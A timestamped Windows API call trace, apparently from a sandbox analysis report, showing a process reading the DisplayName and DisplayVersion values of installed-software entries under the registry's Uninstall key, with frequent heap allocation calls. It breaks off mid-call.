[0221.406] GetProcessHeap () returned 0x2b0000 [0221.406] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.406] GetProcessHeap () returned 0x2b0000 [0221.406] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ecf68, Size=0x18) returned 0x2ceff0 [0221.406] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x62, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.406] GetProcessHeap () returned 0x2b0000 [0221.406] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ceff0 | out: hHeap=0x2b0000) returned 1 [0221.406] RegCloseKey (hKey=0x314) returned 0x0 [0221.406] GetProcessHeap () returned 0x2b0000 [0221.406] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2ecf68 [0221.406] GetProcessHeap () returned 0x2b0000 [0221.407] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ecf68, Size=0x40) returned 0x2c79e0 [0221.407] GetProcessHeap () returned 0x2b0000 [0221.407] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c79e0, Size=0x80) returned 0x2fa200 [0221.407] GetProcessHeap () returned 0x2b0000 [0221.407] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2fa200, Size=0x78) returned 0x2c0ba0 [0221.407] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE4Data", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.407] GetProcessHeap () returned 0x2b0000 [0221.407] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c0ba0 | out: hHeap=0x2b0000) returned 1 [0221.407] GetProcessHeap () returned 0x2b0000 [0221.407] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa) returned 0x2f52e0 [0221.407] GetProcessHeap () returned 0x2b0000 [0221.407] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x14) returned 0x2ceff0 [0221.407] GetProcessHeap () returned 0x2b0000 [0221.407] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ceff0, Size=0x28) returned 0x2dc4e8 [0221.407] GetProcessHeap () returned 0x2b0000 [0221.407] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc4e8, Size=0x1e) returned 0x2ecf68 [0221.407] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x62, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.407] GetProcessHeap () returned 0x2b0000 [0221.407] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.407] RegCloseKey (hKey=0x314) returned 0x0 [0221.407] GetProcessHeap () returned 0x2b0000 [0221.407] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6150 | out: hHeap=0x2b0000) returned 1 [0221.407] GetProcessHeap () returned 0x2b0000 [0221.407] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb4a8 | out: hHeap=0x2b0000) returned 1 [0221.407] GetProcessHeap () returned 0x2b0000 [0221.407] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0890 | out: hHeap=0x2b0000) returned 1 [0221.408] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x6, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE5BAKEX", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.408] GetProcessHeap () returned 0x2b0000 [0221.408] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2ceff0 [0221.408] GetProcessHeap () returned 0x2b0000 [0221.408] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.408] GetProcessHeap () returned 0x2b0000 [0221.408] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ceff0 | out: hHeap=0x2b0000) returned 1 [0221.408] GetProcessHeap () returned 0x2b0000 [0221.408] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2eb4a8 [0221.408] GetProcessHeap () returned 0x2b0000 [0221.408] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2eb3e8 [0221.408] GetProcessHeap () returned 0x2b0000 [0221.408] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb3e8, Size=0x68) returned 0x2d6150 [0221.409] GetProcessHeap () returned 0x2b0000 [0221.409] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2ecf68 [0221.409] GetProcessHeap () returned 0x2b0000 [0221.409] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ecf68, Size=0x40) returned 0x2c79e0 [0221.409] GetProcessHeap () returned 0x2b0000 [0221.409] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c79e0, Size=0x80) returned 0x2fa200 [0221.409] GetProcessHeap () returned 0x2b0000 [0221.409] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2fa200, Size=0x7a) returned 0x2fa288 [0221.409] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE5BAKEX", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.409] GetProcessHeap () returned 0x2b0000 [0221.409] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fa288 | out: hHeap=0x2b0000) returned 1 [0221.409] GetProcessHeap () returned 0x2b0000 [0221.409] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08e0 [0221.409] GetProcessHeap () returned 0x2b0000 [0221.409] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08e0, Size=0x10) returned 0x2f52e0 [0221.409] GetProcessHeap () returned 0x2b0000 [0221.409] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.409] GetProcessHeap () returned 0x2b0000 [0221.409] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ecf68, Size=0x18) returned 0x2ceff0 [0221.409] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x62, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.409] GetProcessHeap () returned 0x2b0000 [0221.409] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ceff0 | out: hHeap=0x2b0000) returned 1 [0221.409] RegCloseKey (hKey=0x314) returned 0x0 [0221.410] GetProcessHeap () returned 0x2b0000 [0221.410] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2ecf68 [0221.410] GetProcessHeap () returned 0x2b0000 [0221.410] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ecf68, Size=0x40) returned 0x2c79e0 [0221.410] GetProcessHeap () returned 0x2b0000 [0221.410] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c79e0, Size=0x80) returned 0x2fa288 [0221.410] GetProcessHeap () returned 0x2b0000 [0221.410] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2fa288, Size=0x7a) returned 0x2fa200 [0221.410] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE5BAKEX", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.410] GetProcessHeap () returned 0x2b0000 [0221.410] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fa200 | out: hHeap=0x2b0000) returned 1 [0221.410] GetProcessHeap () returned 0x2b0000 [0221.410] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa) returned 0x2f52e0 [0221.410] GetProcessHeap () returned 0x2b0000 [0221.410] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x14) returned 0x2ceff0 [0221.410] GetProcessHeap () returned 0x2b0000 [0221.410] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ceff0, Size=0x28) returned 0x2dc4e8 [0221.410] GetProcessHeap () returned 0x2b0000 [0221.410] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc4e8, Size=0x1e) returned 0x2ecf68 [0221.410] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x62, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.410] GetProcessHeap () returned 0x2b0000 [0221.410] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.410] RegCloseKey (hKey=0x314) returned 0x0 [0221.410] GetProcessHeap () returned 0x2b0000 [0221.410] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6150 | out: hHeap=0x2b0000) returned 1 [0221.410] GetProcessHeap () returned 0x2b0000 [0221.411] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb4a8 | out: hHeap=0x2b0000) returned 1 [0221.411] GetProcessHeap () returned 0x2b0000 [0221.411] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0890 | out: hHeap=0x2b0000) returned 1 [0221.411] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x7, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IEData", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.411] GetProcessHeap () returned 0x2b0000 [0221.411] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe) returned 0x2f52e0 [0221.411] GetProcessHeap () returned 0x2b0000 [0221.411] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.411] GetProcessHeap () returned 0x2b0000 [0221.411] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52e0 | out: hHeap=0x2b0000) returned 1 [0221.411] GetProcessHeap () returned 0x2b0000 [0221.411] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2eb4a8 [0221.411] GetProcessHeap () returned 0x2b0000 [0221.411] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2eb3e8 [0221.412] GetProcessHeap () returned 0x2b0000 [0221.412] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb3e8, Size=0x68) returned 0x2d6150 [0221.412] GetProcessHeap () returned 0x2b0000 [0221.412] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2ecf68 [0221.412] GetProcessHeap () returned 0x2b0000 [0221.412] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ecf68, Size=0x40) returned 0x2c79e0 [0221.412] GetProcessHeap () returned 0x2b0000 [0221.412] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c79e0, Size=0x80) returned 0x2fa200 [0221.412] GetProcessHeap () returned 0x2b0000 [0221.412] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2fa200, Size=0x76) returned 0x2c0ba0 [0221.412] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IEData", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.412] GetProcessHeap () returned 0x2b0000 [0221.412] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c0ba0 | out: hHeap=0x2b0000) returned 1 [0221.412] GetProcessHeap () returned 0x2b0000 [0221.412] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08e0 [0221.412] GetProcessHeap () returned 0x2b0000 [0221.412] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08e0, Size=0x10) returned 0x2f52e0 [0221.412] GetProcessHeap () returned 0x2b0000 [0221.412] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.412] GetProcessHeap () returned 0x2b0000 [0221.412] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ecf68, Size=0x18) returned 0x2ceff0 [0221.412] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x62, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.428] GetProcessHeap () returned 0x2b0000 [0221.428] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ceff0 | out: hHeap=0x2b0000) returned 1 [0221.428] RegCloseKey (hKey=0x314) returned 0x0 [0221.428] GetProcessHeap () returned 0x2b0000 [0221.428] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2ecf68 [0221.428] GetProcessHeap () returned 0x2b0000 [0221.428] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ecf68, Size=0x40) returned 0x2c79e0 [0221.428] GetProcessHeap () returned 0x2b0000 [0221.428] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c79e0, Size=0x80) returned 0x2fa200 [0221.428] GetProcessHeap () returned 0x2b0000 [0221.428] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2fa200, Size=0x76) returned 0x2c0ba0 [0221.428] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IEData", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.429] GetProcessHeap () returned 0x2b0000 [0221.429] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c0ba0 | out: hHeap=0x2b0000) returned 1 [0221.429] GetProcessHeap () returned 0x2b0000 [0221.429] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa) returned 0x2f52e0 [0221.429] GetProcessHeap () returned 0x2b0000 [0221.429] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x14) returned 0x2ceff0 [0221.429] GetProcessHeap () returned 0x2b0000 [0221.429] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ceff0, Size=0x28) returned 0x2dc4e8 [0221.429] GetProcessHeap () returned 0x2b0000 [0221.429] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc4e8, Size=0x1e) returned 0x2ecf68 [0221.429] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x62, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.429] GetProcessHeap () returned 0x2b0000 [0221.429] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.429] RegCloseKey (hKey=0x314) returned 0x0 [0221.429] GetProcessHeap () returned 0x2b0000 [0221.429] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6150 | out: hHeap=0x2b0000) returned 1 [0221.429] GetProcessHeap () returned 0x2b0000 [0221.429] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb4a8 | out: hHeap=0x2b0000) returned 1 [0221.429] GetProcessHeap () returned 0x2b0000 [0221.429] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0890 | out: hHeap=0x2b0000) returned 1 [0221.429] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x8, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MobileOptionPack", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.429] GetProcessHeap () returned 0x2b0000 [0221.429] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc4e8 [0221.430] GetProcessHeap () returned 0x2b0000 [0221.430] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.430] GetProcessHeap () returned 0x2b0000 [0221.430] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.430] GetProcessHeap () returned 0x2b0000 [0221.430] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc4e8 | out: hHeap=0x2b0000) returned 1 [0221.430] GetProcessHeap () returned 0x2b0000 [0221.430] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2eb4a8 [0221.431] GetProcessHeap () returned 0x2b0000 [0221.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2eb3e8 [0221.431] GetProcessHeap () returned 0x2b0000 [0221.431] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb3e8, Size=0x68) returned 0x2d6150 [0221.431] GetProcessHeap () returned 0x2b0000 [0221.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x24) returned 0x2dc4e8 [0221.431] GetProcessHeap () returned 0x2b0000 [0221.431] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc4e8, Size=0x48) returned 0x2c6680 [0221.431] GetProcessHeap () returned 0x2b0000 [0221.431] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c6680, Size=0x90) returned 0x2e6040 [0221.431] GetProcessHeap () returned 0x2b0000 [0221.431] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2e6040, Size=0x8a) returned 0x2e6040 [0221.431] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\MobileOptionPack", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.432] GetProcessHeap () returned 0x2b0000 [0221.432] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6040 | out: hHeap=0x2b0000) returned 1 [0221.432] GetProcessHeap () returned 0x2b0000 [0221.432] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.432] GetProcessHeap () returned 0x2b0000 [0221.432] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52b0 [0221.432] GetProcessHeap () returned 0x2b0000 [0221.432] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52b0, Size=0x20) returned 0x2ecf68 [0221.432] GetProcessHeap () returned 0x2b0000 [0221.432] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ecf68, Size=0x18) returned 0x2ceff0 [0221.432] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x62, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.432] GetProcessHeap () returned 0x2b0000 [0221.432] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ceff0 | out: hHeap=0x2b0000) returned 1 [0221.432] RegCloseKey (hKey=0x314) returned 0x0 [0221.432] GetProcessHeap () returned 0x2b0000 [0221.432] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x24) returned 0x2dc4e8 [0221.432] GetProcessHeap () returned 0x2b0000 [0221.432] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc4e8, Size=0x48) returned 0x2c6680 [0221.432] GetProcessHeap () returned 0x2b0000 [0221.432] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c6680, Size=0x90) returned 0x2e6040 [0221.432] GetProcessHeap () returned 0x2b0000 [0221.432] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2e6040, Size=0x8a) returned 0x2e6040 [0221.432] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\MobileOptionPack", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.432] GetProcessHeap () returned 0x2b0000 [0221.433] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6040 | out: hHeap=0x2b0000) returned 1 [0221.433] GetProcessHeap () returned 0x2b0000 [0221.433] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa) returned 0x2f52b0 [0221.433] GetProcessHeap () returned 0x2b0000 [0221.433] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52b0, Size=0x14) returned 0x2ceff0 [0221.433] GetProcessHeap () returned 0x2b0000 [0221.433] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ceff0, Size=0x28) returned 0x2dc4e8 [0221.433] GetProcessHeap () returned 0x2b0000 [0221.433] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc4e8, Size=0x1e) returned 0x2ecf68 [0221.433] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x62, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.433] GetProcessHeap () returned 0x2b0000 [0221.433] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.433] RegCloseKey (hKey=0x314) returned 0x0 [0221.433] GetProcessHeap () returned 0x2b0000 [0221.433] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6150 | out: hHeap=0x2b0000) returned 1 [0221.433] GetProcessHeap () returned 0x2b0000 [0221.433] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb4a8 | out: hHeap=0x2b0000) returned 1 [0221.433] GetProcessHeap () returned 0x2b0000 [0221.433] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52e0 | out: hHeap=0x2b0000) returned 1 [0221.433] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x9, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SchedulingAgent", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.434] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\SchedulingAgent", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.434] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x62, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.434] RegCloseKey (hKey=0x314) returned 0x0 [0221.434] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\SchedulingAgent", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.435] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x62, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.435] RegCloseKey (hKey=0x314) returned 0x0 [0221.435] RegEnumKeyExW (in: hKey=0x310, dwIndex=0xa, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WIC", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.435] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WIC", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.436] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x62, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.436] RegCloseKey (hKey=0x314) returned 0x0 [0221.436] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WIC", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.436] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x62, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.437] RegCloseKey (hKey=0x314) returned 0x0 [0221.437] RegEnumKeyExW (in: hKey=0x310, dwIndex=0xb, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{0FA68574-690B-4B00-89AA-B28946231449}", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.437] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{0FA68574-690B-4B00-89AA-B28946231449}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.438] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x4d, lpcbData=0x27e7e8*=0x7e) returned 0x0 [0221.438] RegCloseKey (hKey=0x314) returned 0x0 [0221.438] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{0FA68574-690B-4B00-89AA-B28946231449}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.438] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x18) returned 0x0 [0221.439] RegCloseKey (hKey=0x314) returned 0x0 [0221.439] RegEnumKeyExW (in: hKey=0x310, dwIndex=0xc, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.439] RegOpenKeyExW (in: hKey=0x80000002, 